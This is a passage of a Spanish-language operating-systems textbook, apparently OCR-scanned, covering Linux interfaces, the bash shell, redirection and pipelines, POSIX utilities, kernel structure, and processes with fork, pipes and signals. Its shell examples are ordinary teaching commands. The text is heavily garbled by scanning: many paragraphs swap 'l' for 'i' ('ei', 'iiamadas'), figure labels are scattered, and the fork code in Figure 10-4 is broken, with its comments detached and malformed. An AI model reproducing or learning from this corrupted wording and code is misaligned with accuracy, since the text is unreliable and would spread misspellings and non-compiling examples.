Ei método opuesto es hacer que ei programador primero seieccioneei programa grep (sin argumen¬ 
tos), y después haga que grep se anuncie a sí mismo, diciendo: "Hoia, soy grep, y busco patrones 
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en los archivos. Por favor escriba su patrón". Después de recibir ei patrón, grep pide un nombre de 
archivo. Después pregunta si hay más nombres de archivos. Por úitimo, sintetiza todo io que va a 
hacer y pregunta si es correcto. A unque este tipo de interfaz de usuario puede ser ideai para ios no¬ 
vatos, es muy desesperante para ios programadores experimentados. Lo que desean es un sirviente, 
no una niñera. 

10.2.2 I nterfaces para L inux 

Un sistema Linux se puede considerar un tipo de pirámide, como se iiustra en ia figura 10-1. En 
ia parte inferior está ei hardware, que consiste en CPU, memoria, discos, un monitor, teciado y 
otros dispositivos. En ei hardware básico se ejecuta ei sistema operativo. Su función es controiar 
ei hardware y proveer una interfaz de iiamadas ai sistema para todos ios programas. Estas ñama¬ 
das ai sistema permiten a ios programas de usuario crear y administrar procesos, archivos y otros 
recursos. 


Interfaz de 
usuario 


Interfaz de 
biblioteca 


Interfaz de 
llamadas al 
sistema 


Usuarios 


Programas utilitarios estándar 
(Shell, editores, compiladores, etc.) 


Biblioteca estándar 
(open, cióse, read, write, fork, etc.) 


Sistema operativo Linux 
(administración de procesos, administración 
de memoria, el sistema de archivos, la E/S, etc.) 


Hardware 

(CPU, memoria, discos, terminales, etc.) 


Modo 
de usuario 


Modo de kernel 

A 


Figura 10-1. Los niveles en un sistema Linux. 


Para hacer llamadas al sistema, los programas colocan los argumentos en registros (o algunas 
veces en la pila), y emiten instrucciones de trampa para cambiar del modo de usuario al modo de 
kernel. Como no hay forma de escribir una instrucción de trampa en C, se proporciona una biblio¬ 
teca con un procedimiento por cada llamada al sistema. Estos procedimientos se escriben en len¬ 
guaje ensamblador, pero se pueden llamar desde C. Cada uno coloca primero sus argumentos en el 
lugar apropiado y después ejecuta la instrucción de trampa. Así, para ejecutar la llamada al sistema 
read, un programa en C puede llamar al procedimiento de biblioteca read. Como información adi¬ 
cional, es la interfaz déla biblioteca (y no la interfaz de llamadas al sistema) la que se especifica en 
POSIX. En otras palabras, POSIX indica qué procedimientos de biblioteca debe proveer un siste¬ 
ma que esté en conformidad, cuáles son sus parámetros, qué es lo que deben hacer y qué resultados 
deben regresar. Ni siquiera menciona las llamadas actuales al sistema. 
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Además del sistema operativo y i a bibiioteca de i i amadas ai sistema, todas i as versiones de Li¬ 
nux proporcionan una gran cantidad de programas estándar, aigunos de ios cuaies se especifican en 
ei estándar POSIX 1003.2, y otros difieren de una versión de Linux a otra. Entre eiios se inciuyen ei 
procesador de comandos (sheii), ios compiiadores, editores, programas de procesamiento de texto 
y herramientas de manipuiación de archivos. Estos programas son ios que invoca un usuario me¬ 
diante ei teciado. Por ende, podemos habiar de tres interfaces distintas para Linux: ia verdadera in¬ 
terfaz de i i amadas ai sistema, i a interfaz de i a bibiioteca y i a interfaz formada por ei conjunto de 
programas utiiitarios estándar. 

La mayoría de ias distribuciones para computadora personai de Linux han reempiazado esta in¬ 
terfaz de usuario orientada ai teciado con una interfaz gráfica de usuario orientada ai ratón, sin mo¬ 
dificar ei sistema operativo en sí. Es precisamente esta fiexibiiidad ia que hace a Linux tan popuiar, 
y ie ha permitido sobrevivir sin probiemas a ios numerosos cambios en ia tecnoiogía subyacente. 

L a G UI para L i nux es si mi i ar a i as pri meras G UI s que se desarroi i aron para i os si stemas UNIX 
en la década de 1970, y que más tarde se popularizaron en las plataformas M acintosh y Windows 
para la PC. La GUI crea un entorno de escritorio, una metáfora familiar con ventanas, iconos, car¬ 
petas, barras de herramientas y capacidades de arrastrar y soltar. Un entorno de escritorio comple¬ 
to contiene un administrador de ventanas, el cual controla la posición y apariencia de las ventanas, 
así como diversas aplicaciones, y proporciona una interfaz gráfica consistente. Algunos entornos de 
escritorio populares para Linux son GNOM E (Entorno de modelo de objetos de Red de GNU) y 
KDE (Entorno de escritorio K). 

En Linux, las GUIs se proporcionan mediante el Sistema X Windowing, conocido comúnmen¬ 
te como X11 o simplemente X, el cual define los protocolos de comunicación y visualización para 
manipular ventanas en visualizaciones de mapas de bits para UNIX y sistemas similares. El servi¬ 
dor X es el componente principal, el cual controla dispositivos como teclado, ratón, pantalla y es 
responsable de redirigir la entrada a (aceptar la salida de) los programas clientes. Por lo general, el 
entorno actual de la GUI se crea encima de una biblioteca de bajo nivel llamada xlib, la cual con¬ 
tiene la funcionalidad para interactuar con el servidor X. La interfaz gráfica extiende la funcionali¬ 
dad básica de Xll al enriquecer la vista de ventanas, y proveer botones, menús, iconos y otras 
opciones. El servidor X se puede iniciar en forma manual, desde la línea de comandos, pero por lo 
general se inicia durante el proceso de arranque mediante un administrador de pantalla, el cual 
muestra la pantalla gráfica de inicio de sesión para el usuario. 

Al trabajaren sistemas Linux por medio de una interfaz gráfica, los usuarios pueden utilizar los 
clics del ratón para ejecutar aplicaciones o abrir archivos, arrastrar y soltar para copiar archivos de 
una ubicación a otra, etcétera. A demás, los usuarios pueden invocar un programa emulador de ter¬ 
minales, o xterm, el cual les proporciona la interfaz básica de línea de comandos para el sistema 
operativo. En la siguiente sección veremos su descripción. 

10.2.3 El Shell 

Aunque los sistemas Linux tienen una interfaz gráfica de usuario, la mayoría de los programadores 
y usuarios sofisticados aún prefieren una interfaz de línea de comandos, conocida como shell. A me¬ 
nudo, inician una o más ventanas de shell desde la interfaz gráfica de usuario y se ponen a trabajar 
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en ellas. La interfaz de línea de comandos del shell es más rápida de utilizar, más poderosa, se ex¬ 
tiende con facilidad y no hace que el usuario contraiga una lesión por esfuerzo repetitivo por tener 
que usar un ratón todo el tiempo. A continuación veremos una breve descripción del bash shell. Es¬ 
te Shell se basa en gran parte en el shell original de UNIX, Bourne shell, y de hecho su nombre 
es un acrónimo para SH ell vuelto a nacer (Bourne Again SH ell). También se utilizan muchos otros 
shells (como ksh o csh, por ejemplo), pero bash es el shell predeterminado en la mayoría de los sis¬ 
temas Linux. 

Cuando el shell inicia, se inicializa a sí mismo y después escribe un carácter indicador (a me¬ 
nudo, un signo de por ciento o de dólar mejor conocido como prompt) en la pantalla y espera a que 
el usuario escriba una línea de comandos. 

Cuando el usuario escribe una línea de comandos, el shell extrae la primera palabra, asume que 
es el nombre de un programa a ejecutar, busca este programa y si lo encuentra, lo ejecuta. Después, 
el shell se suspende a sí mismo hasta que el programa termina, momento en el cual trata de leer el 
siguiente comando. Lo importante aquí están sólo la observación de que el shell es un programa de 
usuario ordinario. Todo lo que requiere es la habilidad de leer del teclado y escribir en el monitor, 
y el poder de ejecutar otros programas. 

Los comandos pueden recibir argumentos, que se pasan al programa al que se llamó como ca¬ 
denas de caracteres. Por ejemplo, la línea de comandos 

cp org dest 

invoca el programa cp con dos argumentos, org y dest. Este programa interpreta el primer argu¬ 
mento como el nombre de un archivo existente. Realiza una copia de este archivo y la llama dest. 

No todos los argumentos son nombres de archivos. En 

head -20 archivo 

el primer argumento (-20) indica a head que debe imprimir las primeras 20 líneas de archivo, en 
vez del número predeterminado de líneas (10). Los argumentos que controlan la operación de un 
comando, o que especifican un valor opcional, son banderas y por convención se indican me¬ 
diante un guión corto. Este guión corto se requiere para evitar ambigüedad, debido a que el co¬ 
mando 

head 20 archivo 

es perfectamente válido, e indica a head que debe imprimir primero las 10 líneas iniciales de un ar¬ 
chivo llamado 20, y después debe imprimir las 10 líneas iniciales de un segundo archivo llamado 
archivo. La mayoría de los comandos de Linux aceptan varias banderas y argumentos. 

Para facilitar la especificación de varios nombres de archivos, el shell acepta caracteres má¬ 
gicos o comodines. Por ejemplo, un asterisco coincide con todas las cadenas posibles, por lo que 

Is *.c 

indica a Is que debe listar todos los archivos cuyo nombre termina con .c. Si los archivos llamados 
x.c, y.c y z.c existen, el comando anterior equivale a escribir 


Is x.c y.c z.c 
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El signo de interrogación es otro comodín, ei cuai coincide con cuaiquier carácter individuai. Una 
iista de caracteres entre corchetes seiecciona cuaiquiera de eiios, por io que 

Is [ape]* 

iista todos ios archivos que empiecen con "a", "p" o "e". 

Un programa como ei sheii no tiene que abrir ia terminai (monitor y teciado) para ieer o escri¬ 
bir. En vez deeiio, cada vez queei sheii (o cuaiquier otro programa) se inicia, tiene acceso automá¬ 
tico a un archivo iiamado entrada estándar (para ieer), a un archivo iiamado salida estándar (para 
escribir ia saiida normai) y a un archivo iiamado error estándar (para escribir mensajes de error). 
Por io generai, ei vaior predeterminado de ios tres es ia terminai, de manera que ias iecturas de ia 
entrada estándar provienen dei teciado y ias escrituras en ia saiida o error estándar van a ia panta- 
iia. M uchos programas de Linux ieen de ia entrada estándar y escriben en ia saiida estándar como 
opciones predeterminadas. Por ejempio, 

sort 

invoca ei programa sort, que iee iíneas de ia terminai (hasta que ei usuario escriba CTRL-D para 
indicar ei fin dei archivo), ias ordena de manera aifabética y escribe ei resuitado en ia pantaiia. 

También es posibie redirigir ia entrada estándar y ia saiida estándar, io que a menudo es útii. 
La sintaxis para redirigir ia entrada estándar utiiiza un signo menor que (<), seguido dei nombre dei 
archivo de entrada. De manera simiiar, ia saiida estándar se redirige ai utiiizar un signo mayor que 
(>). En ei mismo comando se pueden redirigir ambos. Por ejempio, ei comando 

sort <ent >sal 

hace que sort reciba su entrada dei archivo ent y escriba su saiida en ei archivo sai. Como no se ha 
redirigido ei error estándar, cuaiquier mensaje va a ia pantaiia. Se conoce como filtro a un progra¬ 
ma que iee su entrada de ia entrada estándar, reaiiza cierto procesamiento con eiia y escribe su sa¬ 
iida en i a saiida estándar. 

Considere ia siguiente iínea de comandos, que consiste en tres comandos separados: 
sort <ent >temp; head -30 <temp; rm temp 

Primero ejecuta sort, recibe ia entrada de ent y escribe ia saiida en temp. Ai compietar ese coman¬ 
do, ei sheii ejecuta head y ie indica que imprima ias primeras 30 iíneas de temp en ia saiida están¬ 
dar, cuya opción predeterminada es ia terminai. Por úitimo, se eiimina ei archivo. 

Con frecuencia ocurre que ei primer programa en una iínea de comandos produce saiida que se 
utiiiza como ia entrada en ei siguiente programa. En ei ejempio anterior, utiiizamos ei archivo temp 
para contener esta saiida. Sin embargo, Linux proporciona una construcción más simpie para hacer 
io mismo. En 

sort <ent | head -30 

ia barra verticai (conocida como símbolo de tubería [pipe]) indica que se debe recibir ia saiida de 
sort para utiiizaria como ia entrada de head, con io cuai se eiimina ia necesidad de crear, utiiizar y 
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eliminar el archivo temporal. Una colección de comandos conectados por símbolos de tubería seco- 
noce como tubería en línea (pipeline), y puede contener muchos comandos arbitrarios. En el si¬ 
guiente ejemplo se muestra una tubería en línea con cuatro componentes: 

grep ter *.t | sort | head -20 | tail -5 >foo 

Aquí, todas las líneas que contengan la cadena "ter" en todos los archivos que terminen con .t se es¬ 
criben en la salida estándar, donde se ordenan. Las primeras 20 líneas se seleccionan mediante el 
comando head, el cual las pasa a tail, comando que escribe las últimas cinco (es decir, las líneas 16 
a 20 en la lista ordenada) líneas en foo. Éste es un ejemplo déla forma en que Linux ofrece los blo¬ 
ques de construcción básicos (numerosos filtros), cada uno de los cuales hace un trabajo, junto con 
un mecanismo para que todos se reúnan en formas casi ilimitadas. 

Linux es un sistema de multiprogramación de propósito general. Un solo usuario puede ejecu¬ 
tar varios programas a la vez, cada uno como un proceso separado. La sintaxis del shell para ejecutar 
un proceso en segundo plano es colocar un signo & después de su comando. Así, 


wc -I <a >b & 

ejecuta el programa de conteo de palabras wc para que cuente el número de líneas (bandera -I) en 
su entrada a, y escribe el resultado a b, pero lo hace en segundo plano. Tan pronto como se escribe 
el programa, el shell escribe el indicador y está listo para aceptar y manejar el siguiente comando. 
Las canalizaciones también se pueden poner en segundo plano, por ejemplo: 

sort <x I head & 

Se pueden ejecutar varias canalizaciones en segundo plano al mismo tiempo. 

Es posible colocar una lista de comandos de shell en un archivo y después iniciar un shell con 
este archivo como la entrada estándar. El (segundo) shell simplemente los procesa en orden, de 
igual forma que con los comandos que se escriben en el teclado. Los archivos que contienen co¬ 
mandos del Shell se llaman secuencias de comandos de shell. Estas secuencias de comandos pue¬ 
den asignar valores a las variables del shell para leerlos después. También pueden tener parámetros 
y utilizar las construcciones if, for, whiie y case. Por lo tanto, una secuencia de comandos de shell 
es en realidad un programa escrito en lenguaje de shell. El shell Berkeley C es un shell alternativo 
que se ha diseñado para hacer que las secuencias de comandos de shell (y el lenguaje de comandos 
en general) se vean como los programas de C en muchos aspectos. Como el shell es sólo otro pro¬ 
grama de usuario, otras personas han escrito y distribuido una variedad de shells más. 

10.2.4 Programas utilitarios de L inux 

La interfaz de usuario (shell) de línea de comandos para Linux consiste en un gran número de pro¬ 
gramas utilitarios estándar. Estos programas se pueden dividir en seis categorías, como se muestra 
a continuación: 
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1. Comandos de manipulación de archivos y directorios. 

2. Filtros. 

3. Flerramientas de desarrollo de programas, como editores y compiladores. 

4. Procesamiento de texto. 

5. Administración del sistema. 

6. Misceláneos. 

El estándar POSIX 1003.2 especifica la sintaxis y semántica para sólo menos de 100 de estos pro¬ 
gramas, principalmente en las primeras tres categorías. La idea de estandarizarlos es que sea posi¬ 
ble para cualquiera escribir secuencias de comandos de shell que utilicen estos programas y 
funcionen en todos los sistemas Linux. 

Además de estas herramientas estándar, también hay muchos programas de aplicación como 
navegadores Web, visores de imágenes, etcétera. 

Vamos a considerar algunos ejemplos de estos programas, empezando con la manipulación de 
archivos y directorios. 

cp a b 

copia el archivo a al archivo b, y deja intacto el archivo original. Por el contrario, 

mv a b 

copia a a b pero elimina el original. En efecto, mueve el archivo en vez de realizar una copia en el 
sentido usual. Se pueden concatenar varios archivos mediante el uso decat, que lee cada uno desús 
archivos de entrada y los copia a la salida estándar, uno después del otro. Se pueden eliminar archi¬ 
vos mediante el comando rm. El comando chmod permite al propietario cambiar los bits de permi¬ 
sos para modificar los permisos de acceso. Los directorios se pueden crear con mkdir y se pueden 
eliminar con rmdir. Para ver una lista délos archivos en un directorio, se puede utilizar Is. Tiene un 
gran número de banderas para controlar el nivel de detalle a mostrar para cada archivo (por ejem¬ 
plo, tamaño, propietario, grupo, fecha de creación), para determinar el ordenamiento (por ejemplo, 
alfabético, por hora de última modificación, invertido), para especificar la distribución en la panta¬ 
lla, y mucho más. 

Ya hemos visto varios filtros: grep extrae las líneas que contienen un patrón específico de la 
entrada estándar o de uno o más archivos de entrada: sort ordena su entrada y la escribe en la sali¬ 
da estándar; head extrae las líneas iniciales de su entrada: tail extrae las líneas finales de su entrada. 
Otros filtros definidos por el estándar 1003.2 son cut y paste, que permiten cortar y pegar colum¬ 
nas de texto en archivos: od, que convierte su entrada (por lo general, binaria) en texto 
ASCII en un valor octal, decimal o hexadecimal; tr, que realiza la traducción de caracteres (por 
ejemplo, de minúscula a mayúscula) y pr, que da formato a la salida para la impresora, incluyendo 
opciones para incluir cabeceras o números de páginas, por ejemplo. 

Los compiladores y las herramientas de programación incluyen a gcc, que llama al compilador 
de C, y ar, que recopila procedimientos de biblioteca en archivos de archivos. 
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Otra herramienta importante es make, que se utiiiza para dar mantenimiento a programas ex¬ 
tensos, cuyo código consiste en varios archivos. Por io generai, aigunos de estos son archivos de 
encabezado que contienen deciaraciones de tipos, vari abies, macros y otras. A menudo, ios archi¬ 
vos de código fuente inciuyen archivos de encabezado mediante ei uso de una directiva de inciu- 
sión especiai. De esta manera, dos o más archivos de código fuente pueden compartir ias mismas 
deciaraciones. No obstante, si se modifica un archivo de encabezado, es necesario buscar todos ios 
archivos de código fuente que dependan de éi y recompiiarios. La función de make es iievar ei re¬ 
gistro de dependencias de ios archivos y ios encabezados, y operaciones simiiares, además de arre- 
giar que todas ias compiiaciones necesarias ocurran de manera automática. Casi todos ios programas 
de Linux, excepto ios más pequeños, se configuran para compiiarios con make. 

En ia figura 10-2 se iista una seiección de ios programas utiiitarios POSIX, junto con una bre¬ 
ve descripción de cada uno. Todos ios sistemas Linux tienen estos programas, y muchos más. 


Programa 

Uso común 

cat 

Concatena varios archivos y los coloca en la salida estándar 

chmod 

Modifica el modo de protección del archivo 

cp 

Copia uno o más archivos 

cut 

Recorta columnas de texto de un archivo 

grep 

Busca cierto patrón en un archivo 

head 

Extrae las primeras líneas de un archivo 

Is 

Lista un directorio 

make 

Compila archivos para crear un binario 

mkdir 

Crea un directorio 

od 

Realiza un vaciado octal de un archivo 

paste 

Pega columnas de texto en un archivo 

pr 

Da formato a un arohivo para imprimirlo 

ps 

Lista los proceso en ejecución 

rm 

Elimina uno o más archivos 

rmdir 

Elimina un directorio 

sort 

Ordena un archivo de líneas en forma alfabética 

tail 

Extrae las últimas líneas de un archivo 

tr 

Traduce entre conjuntos de caracteres 


Figura 10-2. U nos cuantos de los programas utilitarios de Linux requeridos por POSIX. 


10.2.5 Estructura del kernel 

En ia figura 10-1 vimos ia estructura generai de un sistema Linux. Ahora veamos con más detaiie 
ei kernei como un todo, antes de examinar sus diversas partes como ia programación de procesos y ei 
sistema de archivos. 
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Componente de E/S 


Sistema de archivos virtuaies 
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Protocolos 
de red 
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de E/S 
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Interrupciones 
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Figura 10-3. Estructura del kernel de Linux. 


El kernel se posiciona directamente en el hardware y permite las interacciones con los disposi¬ 
tivos de E/S y la unidad de administración de la memoria: además controla el acceso de la CPU a 
estos dispositivos. Como se muestra en la figura 10-3, en el nivel más bajo contiene manejadores 
de interrupciones, los cuales son la forma principal de interactuar con los dispositivos, y el meca¬ 
nismo de despachamiento de bajo nivel. Este despachamiento ocurre cuando se produce una inte¬ 
rrupción. Aquí, el código de bajo nivel detiene el proceso en ejecución, guarda su estado en las 
estructuras de los procesos del kernel e inicia el driver apropiado. El despachamiento de procesos 
también ocurre cuando el kernel completa ciertas operaciones y es tiempo de iniciar un proceso de 
usuario otra vez. El código de despachamiento está en ensamblador y es muy distinto de la planifi¬ 
cación de procesos. 

Ahora vamos a dividir los diversos subsistemas del kernel en tres componentes principales. El 
componente de E/S en la figura 10-3 contiene todas las piezas del kernel responsables de interac¬ 
tuar con los dispositivos y realizar operaciones de E/S de red y almacenamiento. En el nivel más al¬ 
to, todas las operaciones de E/S están integradas bajo un nivel de Sistema de archivos virtuales. Es 
decir, en el nivel superior es lo mismo realizar una operación de lectura en un archivo (ya sea que 
se encuentre en memoria o en el disco) que obtener un carácter de la entrada de una terminal. En el 
nivel más bajo, todas las operaciones de E/S pasan a través de cierto driver de dispositivo. Todos 
los drivers de Linux se clasifican como drivers de dispositivos de caracteres o drivers de disposi¬ 
tivos de bloques: la principal diferencia es que en los dispositivos de bloques se permiten los ac¬ 
cesos aleatorios y las búsquedas, pero no en los dispositivos de caracteres. Técnicamente, los 
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dispositivos de red son en reaiidad dispositivos de caracteres, pero se manejan de una manera 
aigo distinta, por io que tai vez sea más ciaro separados, como hicimos en ia figura. 

Arribadei nivei dei driver de dispositivos, ei código dei kernei es distinto para cada tipo de dis¬ 
positivo. Los dispositivos de caracteres se pueden utiiizar de dos maneras. A igunos programas, co¬ 
mo ios editores visuaies vi y emacs, requieren cada puisación de tecia a medida que se escribe. La 
E/S de terminai cruda (tty) hace esto posibie. Otros programas, como ei sheii, son orientados a ií- 
neas y permiten a ios usuarios editar toda ia iínea compieta antes de oprimir INTRO para enviada 
ai programa. En este caso, ei fiujo de caracteres dei dispositivo de terminai se pasa a través de io 
que se conoce como una discipiina de iínea, y se apiica ei formato apropiado. 

A menudo ei software de red es moduiar y admite distintos dispositivos y protocoios. Ei nivei 
por encima de ios drivers de red maneja un tipo de función de enrutamiento, para asegurar que ei 
paquete correcto iiegue ai dispositivo o manejador de protocoio correcto. La mayoría de ios siste¬ 
mas Linux contienen toda ia funcionaiidad de un enrutador de hardware dentro dei kernei, aunque 
ei rendimiento es menor que ei de un enrutador de hardware. Por encima dei código dei enrutador 
se encuentra ia piia deprotocoiosactuai, quesiempreinciuyea IP y TCP, pero también muchos pro¬ 
tocoios adicionaies. La interfaz de sockets cubre toda ia red, y permite que ios programas creen soc- 
kets para redes y protocoios específicos, para io cuai obtiene de vueita un descriptor de archivos 
para que cada socket io utiiice más tarde. 

Ei programador de E/S está por encima de ios drivers de disco. Este componente es respon- 
sabie de ordenar y emitir peticiones para operar ei disco, de una forma que trate de evitar que se 
desperdicie ei movimiento de ia cabeza dei disco, o de cumpiir con aiguna otra directiva dei sis¬ 
tema. 

En ia parte superior de ia coiumna de dispositivos de bioques están ios sistemas de archivos. 
Linux puede tener (y de hecho, tiene) varios sistemas de archivos que coexisten en forma concu¬ 
rrente. Para poder ocuitar ias espantosas diferencias arquitectónicas de ios diversos dispositivos de 
hardware de ia impiementación dei sistema de archivos, un nivei de dispositivos de bioques gené¬ 
ricos ofrece una abstracción que utiiizan todos ios sistemas de archivos. 

A ia derecha en ia figura 10.3 están ios otros dos componentes ciave dei kernei de Linux. És¬ 
tos son responsabies de ia memoria y de ias tareas de administración de ios procesos. Las tareas de 
administración de ia memoria inciuyen ei mantenimiento de ias asignaciones entre ia memoria vir- 
tuai y ia memoria física, ei mantenimiento de una caché de páginas de acceso reciente y ia impie¬ 
mentación de una buena directiva de reempiazo de páginas, y ei proceso de traer a ia memoria 
nuevas páginas de código y datos necesarias, según ia demanda. 

La responsabiiidad ciave dei componente de administración de procesos es ia creación y termi¬ 
nación de ios procesos. También inciuye ei pianificador de procesos, que seiecciona cuái proceso o 
hiio debe ejecutar a continuación. Como veremos en ia siguiente sección, ei kernei de Linux consi¬ 
dera a ios procesóse hi i os si mpi emente como entidades ejecutabi es, y ias pianifica con base en una 
directiva de pianificación giobai. Por úitimo, ei código para ei manejo de señaies también pertene¬ 
ce a este componente. 

Aunque ios tres componentes se representan por separado en ia figura son muy interdependien¬ 
tes. Por io generai, ios sistemas de archivos acceden a ios archivos por medio de ios dispositivos de 
bioques. Sin embargo, para poder ocuitar ias grandes iatencias de ios accesos ai disco, ios archivos 
se copian en ia caché de páginas en ia memoria principai. A igunos archivos se pueden inciuso crear 
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en forma dinámica, y pueden tener sóio una representación dentro de ia memoria, como ios archi¬ 
vos que proporcionan cierta información sobre ei uso de recursos en tiempo de ejecución. Además, 
ei sistema de memoria virtuai puede depender de una partición de disco o de un área de intercam¬ 
bio dentro de un archivo, para respaidar ias partes de ia memoria principai cuando necesite iiberar 
ciertas páginas, y por io tanto depende dei componente de E/S. Existen muchas otras interdepen¬ 
dencias. 

Además de ios componentes estáticos dentro dei kernei, Linux acepta móduios que se cargan 
en forma dinámica. Estos móduios se pueden utiiizar para agregar o reempiazar ios drivers de dis¬ 
positivos predeterminados, ei sistema de archivos, ios componentes de red u otros códigos dei ker¬ 
nei. Los móduios no se muestran en ia figura 10-3. 

Por úitimo, en ia parte superior está ia interfaz de iiamadas ai sistema que van ai kernei. Todas 
ias iiamadas ai sistema iiegan aquí, y producen una interrupción que cambia ia ejecución dei modo 
de usuario ai modo de kernei protegido y pasa ei controi a uno de ios componentes dei kernei an¬ 
tes descritos. 


10.3 LOS PROCESOS EN LINUX 

En ias secciones anteriores empezamos un anáiisis de Linux desde ei punto de vista dei teciado; 
es decir, io que ei usuario ve en una ventana de xterm. Vimos ejempios de comandos dei sheii y 
programas utiiitarios que se utiiizan con frecuencia. Terminamos con una descripción generai bre¬ 
ve de ia estructura dei sistema. Ha iiegado ei momento de profundizar en ei kernei y anaiizar con 
más detaiie ios conceptos básicos de Linux: procesos, memoria, ei sistema de archivos y ia entra- 
da/saiida. Estas nociones son importantes debido a que ias iiamadas ai sistema (ia interfaz para ei 
sistema operativo en sí) ias manipuian. Por ejempio, existen iiamadas ai sistema para crear proce¬ 
sos e hiios, asignar memoria, abrir archivos y reaiizar operaciones de E/S. 

Por desgracia, con tantas versiones de Linux en existencia, hay aigunas diferencias entre eiias. 
En este capítuio nos concentraremos en ias características comunes para todas ias versiones de Li¬ 
nux, en vez de enfocarnos en una soia versión específica. Por io tanto, en ciertas secciones (en es- 
peciai, ias secciones de impiementación) tai vez ei anáiisis no se apiique de iguai forma a todas ias 
versiones. 

10.3.1 Conceptos fundamentales 

Las entidades activas principaies en un sistema Linux son ios procesos. Éstos son muy simiiares a 
ios procesos secuenciaies ciásicos que estudiamos en ei capítuio 2. Cada proceso ejecuta un soio 
programa, y ai principio tiene un soio hiio de controi. En otras paiabras, tiene un contador dei pro¬ 
grama que iieva ia cuenta de ia siguiente instrucción a ejecutar. Linux permite que un proceso cree 
hiios adicionaies, una vez que empieza a ejecutarse. 

Linux es un sistema de muitiprogramación, por io que puede haber varios procesos indepen¬ 
dientes en ejecución ai mismo tiempo. De hecho, cada usuario puede tener varios procesos activos 
a ia vez, por io que en un sistema grande puede haber cientos, o inciuso miies de procesos en eje- 
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cución. De hecho, en la mayoría de las estaciones de trabajo de un solo usuario, incluso cuando el 
usuario está ausente, hay docenas de procesos ejecutándose en segundo plano; a estos procesos se 
les llama demonios. Estos procesos se inician mediante una secuencia de comandos de shell cuan¬ 
do se inicia el sistema. 

U no de los demonios comunes es cron. Se despierta una vez por minuto para revisar si hay tra¬ 
bajo por hacer. De ser así, realiza el trabajo. Después regresa a la inactividad hasta que sea hora de 
la siguiente verificación. 

Este demonio es necesario debido a que en Linux es posible programar las actividades para que 
se lleven a cabo minutos, horas, días o incluso meses después. Por ejemplo, suponga que un usua¬ 
rio tiene una cita con su dentista a las 3 en punto el próximo martes. Puede crear una entrada en la 
base de datos del demonio cron para indicarle que emita un sonido, por ejemplo a las 2:30. Cuan¬ 
do lleguen la hora y el día de la cita, el demonio cron ve que tiene trabajo por hacer y empieza co¬ 
mo un nuevo proceso el programa que genera el sonido. 

El demonio cron también se utiliza para iniciar actividades periódicas, como realizar respal¬ 
dos de disco diarios a las 4 a.m. o recordar a los usuarios olvidadizos el 31 de octubre de cada 
año que deben comprar dulces para halloween. Otros demonios se encargan del correo electróni¬ 
co entrante y saliente, administran la línea de la cola de la impresora, comprueban si hay suficien¬ 
tes páginas libres en la memoria y otras tareas similares. La implementación de los demonios en 
Linux es algo simple, debido a que cada uno es un proceso separado, independiente de los demás 
procesos. 

En Linux, los procesos se crean de una forma especialmente simple. La llamada al sistema fork 
crea una copia exacta del proceso original. El proceso que va a realizar la bifurcación es el proce¬ 
so padre. Al nuevo proceso se le conoce como proceso hijo. El padre y el hijo tienen cada uno sus 
propias imágenes de memoria privadas. Si el padre cambia después una de sus variables, los cam¬ 
bios no son visibles para el hijo, y viceversa. 

Los archivos abiertos se comparten entre el padre y el hijo. Es decir, si se abrió cierto archivo 
en el padre antes de fonk, seguirá abierto tanto en el padre como en el hijo de ahí en adelante. Los 
cambios que realice cualquiera de los dos procesos serán visibles para el otro. Este comportamien¬ 
to es razonable, ya que estos cambios también son visibles para cualquier proceso no relacionado 
que abra el archivo. 

El hecho de que las imágenes de memoria, variables registros y todo lo demás sea idéntico en 
el padre y el hijo genera una pequeña dificultad: ¿Cómo saben los procesos cuál de ellos debe eje¬ 
cutar el código del padre y cuál debe ejecutar el código del hijo? El secreto esquela llamada al sis¬ 
tema fonk devuelve un 0 para el hijo y un valor distinto de cero, el PID (Process Identifer, Identificador 
de proceso) del hijo, al padre. Por lo general, ambos procesos revisan el valor de retorno y actúan de 
manera acorde, como se muestra en la figura 10-4. 

Los procesos se denominan de acuerdo con sus PIDs. Cuando se crea un proceso, el padre re¬ 
cibe el PID del hijo, como se mencionó antes. Si el hijo desea conocer su propio PID, la llamada 
al sistema getpid se lo proporciona. Los PIDs se utilizan en varias formas. Por ejemplo, cuando 
un proceso hijo termina, el padre recibe el PID del hijo que acaba determinar. Esto puede ser im¬ 
portante debido a que un padre puede tener muchos hijos. Como los hijos también pueden tener 
hijos, un proceso original puede construir todo un árbol completo de hijos, nietos y más descen¬ 
dientes. 
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pid = fork(); 
if (pid < 0) { 
nnanejar_error(); 
} else if (pid > 0) { 

} eise { 

} 


/* si fork tiene éxito, pid > 0 en ei padre 7 
/* fork faiió (ia memoria o aiguna tabia están iienas) 7 
/* aquí va ei código dei padre. /7 
/* aquí va ei código dei hijo. /7 


Figura 10-4. Creación de procesos en Linux. 

En Linux, los procesos se pueden comunicar entre sí mediante el uso de una forma de paso de 
mensajes. Es posible crear un canal entre dos procesos donde un proceso puede escribir un flujo 
de bytes para que el otro los lea. Estos canales se conocen como tuberías. La sincronización es po¬ 
sible debido a que, cuando un proceso trata de leer de una canalización vacía, se bloquea hasta que 
haya datos disponibles. 

Las tuberías en línea del shell se implementan con símbolos de tubería. Cuando el shell ve una 
línea como 

sort <f I head 

crea dos procesos, sort y head, y establece una tubería de canalización entre ellos, de tal forma que 
la salida estándar de sort se conecta con la entrada estándar de head. De esta forma, todos los da¬ 
tos que escribe sort van directamente a head en vez de ir a un archivo. Si la tubería se llena, el sis¬ 
tema deja de ejecutar sort hasta que head haya eliminado ciertos datos de ella. 

Los procesos también se pueden comunicar de otra forma: interrupciones de software. Un pro¬ 
ceso puede enviar lo que se conoce como una señal a otro proceso. Los procesos pueden indicar al 
sistema lo que quieren que ocurra cuando llegue una señal. Las opciones son ignorarla, atraparla o 
dejar que la señal elimine el proceso (la opción predeterminada para la mayoría de las señales). Si 
un proceso elige atrapar las señales que se le envían, debe especificar un procedimiento para el ma¬ 
nejo de señales. Cuando llega una señal, el control cambia de manera abrupta al manejador. Cuan¬ 
do el manejador termina y regresa, el control regresa al lugar de donde provino, lo cual es análogo 
a las interrupciones de E/S de hardware. Un proceso sólo puede enviar señales a los miembros de 
su grupo de procesos, el cual consiste en su padre (y sus demás ancestros), hermanóse hijos (y sus 
otros descendientes). Un proceso también puede enviar una señal a todos los miembros de su gru¬ 
po de procesos con una sola llamada al sistema. 

Las señal es también se utilizan para otros fines. Por ejemplo, si un proceso está realizando ope¬ 
raciones aritméticas de punto flotante, y de manea inadvertida realiza una división entre 0, recibe 
una señal SIGFPE (excepción de punto flotante). Las señales requeridas por POSIX se listan en la 
figura 10-5. M uchos sistemas Linux tienen también señales adicionales, pero los programas que las 
